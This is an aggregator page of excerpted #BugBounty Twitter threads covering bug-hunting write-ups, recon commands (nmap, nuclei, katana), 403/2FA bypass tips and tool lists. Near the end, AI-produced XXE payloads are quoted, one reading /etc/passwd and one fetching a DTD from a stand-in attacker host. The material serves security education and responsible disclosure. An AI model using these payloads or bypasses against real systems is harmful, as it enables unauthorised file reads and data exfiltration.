Discover and read the best of Twitter Threads about #BugBounty

Most recents (24)

𝐅𝐑𝐄𝐄 𝐂𝐲𝐛𝐞𝐫𝐬𝐞𝐜𝐮𝐫𝐢𝐭𝐲 𝐂𝐞𝐫𝐭𝐢𝐟𝐢𝐜𝐚𝐭𝐢𝐨𝐧 𝐢𝐧 𝟐𝟎𝟐𝟑 :
𝐁𝐫𝐞𝐚𝐤𝐢𝐧𝐠 𝐢𝐧𝐭𝐨 𝐜𝐲𝐛𝐞𝐫𝐬𝐞𝐜𝐮𝐫𝐢𝐭𝐲

#Infosec Thread
👇
Cybersecurity is a rapidly growing field, and the demand for qualified professionals is high. A cybersecurity certificate can help you gain the skills and knowledge you need to start a career in this in-demand field.
Here are some of the benefits of getting a cybersecurity certificate:

1. Increased job opportunities
2. Higher salaries
3. More job security
4. Personal satisfaction
5. Addition To Your Knowledge
Read 12 tweets
Some of the major vulnerabilities and related POC’s:

➡SQLi
➡XSS
➡SSRF
➡XXE
➡Path Traversal
➡Open Redirection
➡Account Takeover
➡Remote code execution
➡IDOR
➡CSRF

#hacking #bugbounty #bugbountytips

Are Found Below🧵(1/n)👇
Read 13 tweets
😉You would love to grab these for yourselves won't you... 🕶️but hold on they are currently in the hands of inquisitive #hardwarehackers at to make these hardware devices be ready for future threats

⌚️Teardown has begun at #HardPwn🛩️

#hw_ioUSA2023 Image
Read 4 tweets
Nuclei + AI = Money 🤑

Here's how to use AI and nuclei to make money while you sleep 👇🧵
#bugbountytips #bugbounty Image
1. Run nuclei

First of all, if you can use a server or any kind of droplet (for Axiom, Hakq or Nuclei Cloud) that would be great!

Use them and run nuclei on a large number of subdomains.
See the final command in the next tweet 👇
2. Nuclei config

- max number of templates to be executed in parallel (-c)
- number of hosts to be analyzed in parallel per template (-bs)
- rate limit number (-rl)

Final command:
"nuclei -o output.txt -bs <> -c <> -rl <>"

Learn more about @pdnuclei 👇
nuclei.projectdiscovery.io/nuclei/get-sta…
Read 6 tweets
How we, @vidocsecurity, bypass 401 and 403 - practical tips for fellow #bugbounty hunters <thread> Image
Try fuzzing HTTP method/user agents, you would be surprised how many times simply changing User-Agent to e.g. mobile specific client worked. Image
Play with forward/referer type of headers and their values. Try different variants, fuzz common custom headers that follow the pattern with different formats of localhost/custom IP address. Image
Read 7 tweets
Wondering what happened this week in #BugBounty and pentesting? Procrastinating on twitter and want to pretend to be productive? Let's check out this weeks #BugBytes
PS: did you notice that the write ups and tutorials are now separated? If you're looking for more advanced security research or grow your skills! A screenshot of the latest ...
1⃣@NahamSec talks about 2 months of bug hunting, the luck, approach and choosing a program and also burn out
Read 12 tweets
🧵NEW THREAD🧵
Here is how I was able to takeover the whole company's AWS infrastructure under 10 min after a new asset launch at @Hacker0x01 private program ImageImage
1. I was invited in the morning to a private program at H1 and the program updated the scope in the evening, So I decided to take a look to see if there is something to hack
2. I visited the main website in scope, to my surprise and thanks to @trufflesec Chrome extension Trufflehog which could be found here chrome.google.com/webstore/detai…
Read 11 tweets
🧵NEW Thread🧵

Here is how I found the easiest SQLi and possible RCE in less than 30 min of recon and dorking

1. I was invited to a private program at @Hacker0x01 and the first thing I usually do is to look at the scope and see if it is a wildcard domain or just a small scope. ImageImage
2. Found that the program accepts all vulnerabilities related to their assets and of course third party assets are OOS
3. I used @leak_ix search engine at leakix.net and used this dork [+target_name ++plugin:"GitConfigHttpPlugin"]
Note : this is used to search for already scanned websites that have /.git exposed
Read 13 tweets
ProjectDiscovery Recon Series 🔥

Your daily Sunday reading is brought to you by @pdiscoveryio with its Recon 101 Series.🧵👇

#Recon #AttackSurface #bugbounty #recontips #projectdiscovery Image
1 - Active and Passive Recon

Master both techniques to uncover target info stealthily.

blog.projectdiscovery.io/reconnaissance…
2 - Subdomain Enumeration

Unveil hidden web assets.

blog.projectdiscovery.io/recon-series-2/
Read 6 tweets
A lesser-known yet effective way of #bugbounty hunting is called "hacktivity" hunting. It involves bypassing fixes on disclosed reports found on @Hacker0x01's hacktivity page. This approach helped me score a $5k bounty! Here's how it works.👇

#InfoSec #CyberSecurity
With hacktivity hunting, the hard part - finding interesting behavior or insecure features - is already done for you. Your main role is to find a bypass.

For example, I found a bypass for a report on hackerone.com/reports/949643

#BugBountyTips
The original report tried to restrict access to /admin by restricting the path in Nginx. However, I bypassed it using simple encoding - /%2561dmin. Endpoints required authentication, but I bypassed this by adding ".json" at the end.

#BugBounty #Hacking
Read 8 tweets
Want to improve your network scanning skills with Nmap? 🕵️‍♀️💻

Check out these 5 quick tips to define targets, speed up scans, and scan with specific script categories! 🧵👇

#recon #recontips #AttackSurface #bugbounty #recontools #cybersecurity
1/5 Let's start with how to define targets.

Define targets for nmap scan by specifying IP addresses, IP ranges, domain names, or using a target list file.

$ nmap <IP1> <IP2> …
$ nmap 192.168.0.1/24
$ nmap <domain name>
$ nmap -iL <target list file>
2/5 The Ippsec scan for basic coverage.

Perform a comprehensive network scan using nmap's Ippsec initial scan.

$ nmap 127.0.0.1 -sC -sV -oA initial_nmap_scan
Read 7 tweets
Two factor Authentication bypass : ⚔️

- In applications registration , it required a mobile number for compulsory 2 factor authentication.
- Captured the request for mobile number addition
POST /mobile/add

{XXNUMBERXX}
(1/n)

- Now followed the registration normally by adding a mobile number.
- Now when I login to account it required an otp to proceed.
- Used an invalid otp like 111111 and intercepted the request.
- Changed the request PATH and BODY to earlier captured request.
(2/n)

- They we’re implementing checks for all internal api endpoints before entering otp but forget to add check for mobile number addition request.
- I was able to add a new number without entering otp
- This led to 2fa bypass.

#infosec #cybersec #bugbounty
Read 3 tweets
😱 I asked ChatGPT "What are some of the unpopular SQL injection areas" and this is what it replied.

🧵👇

#bugbounty #cybersecurity #infosec #sqli
1. Error messages: Sometimes error messages can reveal important information about the application's database, such as table names or column names. An attacker can use this information to craft a SQL injection attack.
2. Search fields: Search fields are often overlooked when testing for SQL injection vulnerabilities, but they can be an easy target for attackers. In un-sanitized search queries, an attacker can inject SQL code to retrieve sensitive data from the database.
Read 7 tweets
40 Best PenTesting Toolkits

Information Gathering

•OSINT Framework
•Nmap
•Whois
•Recon-ng
•Wireshark
•Dnsrecon
•Google Hacking Database
•Nikto
•Dnsenum
Scanning and Enumeration

•Nmap
•Nikto
•Powershell Scripts
•Openvas
•Nessus
•Sqlninja
•OWASP ZAP
•Wp-scan
Exploitation

•Metasploit
•Sqlmap
•Mitre Att&ck
•Burp Suite
•Hydra
•Netcat
•Routersploit
•Cain and Abel
•John the Ripper
•Hashcat
Read 7 tweets
☃️Bug Bounty Beginner's Roadmap☃️

Many of you have asked me how to get started at bugbounty and what are the pre-requisites to get started.

This repository contains nearly everything you need to know and can help you get started easily with a variety of resources.

#bugbounty
@techhacker98 That's a wrap!

If you enjoyed this thread:

1. Follow me @thebinarybot to get quality content on cybersecurity and bug bounty hunting.
2. RT the tweet below to share this thread with your audience
Read 4 tweets
The team at @OpenAI just fixed a critical account takeover vulnerability I reported few hours ago affecting #ChatGPT.

It was possible to takeover someone's account, view their chat history, and access their billing information without them ever realizing it.

Breakdown below 👇
@OpenAI The vulnerability was "Web Cache Deception" and I'll explain in details how I managed to bypass the protections in place on chat.openai.com.

It's important to note that the issue is fixed, and I received a "Kudos" email from @OpenAI's team for my responsible disclosure.
While exploring the requests that handle ChatGPT's authentication flow I was looking for any anomaly that might expose user information.

The following GET request caught my attention:

https://chat.openai[.]com/api/auth/session
Read 19 tweets
Few months ago @osiryszzz and me discovered an interesting case of SQL injection on the @SynackRedTeam target which was black box testing.

During recon we noticed that there was an unrestricted file upload mechanism available to the any user. #bugbounty #bugbountytips /1
We noticed that the target was only processing the ZIP files but where the content unzipped wasn't clear which was preventing potential RCE or file overwrite via ZIP bombing. /2
However it appears that each file entry inside the ZIP file was added to the database after unpacking, which we wanted to see if it's possible to achieve SQL injection, by simply making file name with SQL injection payload. /3
Read 6 tweets
From Noob to Pentesting Clients in 2023 👇
1. Be laser focused to become l33t. Cybersecurity is a large field and you can't be an expert of everything.
2. Let's say you choose application security. Here's how I would skill up really fast.
Read 9 tweets
HTTP Parameter Pollution @SecGPT has seen in its training. Image
1. ATO via password reset

The attacker manipulates the HTTP parameters of the password reset page to change the email address associated with the account; then use the password reset link => ATO.
2. Price manipulation in e-commerce platforms

The attacker manipulates the HTTP parameters of an e-commerce website to change the price of a product. The attacker can then purchase the product at a lower price than intended.
Read 5 tweets
🚀🔒Exciting news! SecGPT is now LIVE!

Trained on thousands of cybersecurity reports, SecGPT revolutionizes cybersecurity with AI-driven insights.👇
1. Trained on an extensive collection of cybersecurity reports, @SecGPT provides you with a deeper understanding of vulnerabilities, exploitation techniques, and emerging trends in cybersecurity.

Its knowledge increases as more reports and writeups are published.
2. Explore SecGPT's capabilities and see how it can assist you in enhancing your cybersecurity expertise.

Try it out for free at alterai.me

#ai #cybersecurity #infosec #pentesting #ethicalhacking #bugbounty #bugbountytips #secgpt
Read 7 tweets
Boost your pentesting and bug bounty game with SecGPT's AI insights from thousands of online security reports.

I've asked it for some XXE payloads found in the reports. Image
1. Basic XXE payload

`<!DOCTYPE foo [<!ELEMENT foo ANY ><!ENTITY xxe SYSTEM "file:///etc/passwd" >]><foo>&xxe;</foo>`
2. Blind XXE payload

`<!DOCTYPE foo [<!ENTITY % xxe SYSTEM "http://attackerdomain/xxe.dtd">%xxe;]><foo></foo>`
Read 7 tweets
Unlocking the Secrets: Breaking Access Controls, the basics 👇

(from the AI model I'm currently training on security reports) Image
1. Direct object reference

This occurs when an attacker is able to access a resource directly by manipulating a parameter in the URL or form data.
2. Horizontal privilege escalation

This occurs when an attacker is able to access resources or perform actions that are intended for another user with the same level of access.
Read 8 tweets
Often times to simplify my work I build scripts.👇

I recently discovered katana by @pdiscoveryio. And I turned this:

katana -d 5 -c 50 -p 20 -ef "ttf,woff,svg,jpeg,jpg,png,ico,gif,css" -u <https://tld> -cs "regex-to-restrict-to-tld-and-subdomains"

into this:

kata <tld>
1. The long command does the following:

-d => depth 5
-c => concurrency 50
-p => threads in parallel 20
-ef => exclude these
-u => supply the top level domain (i.e. twitter.com)
-cs => scope for this regex (limited to the tld and its subdomains)
2. You can download the kata bash script from my repo below. Use it as:

kata <tld>

Do me a favor and star the repo, thanks!

#pentesting #infosec #cybersecurity #ethicalhacking #bugbounty #bugbountytips

github.com/CristiVlad25/s…
Read 3 tweets

Related hashtags

Did Thread Reader help you today?

Support us! We are indie developers!


This site is made by just two indie developers on a laptop doing marketing, support and development! Read more about the story.

Become a Premium Member ($3.00/month or $30.00/year) and get exclusive features!

Become Premium

Too expensive? Make a small donation by buying us coffee ($5) or help with server cost ($10)

Donate via Paypal Become our Patreon

Thank you for your support!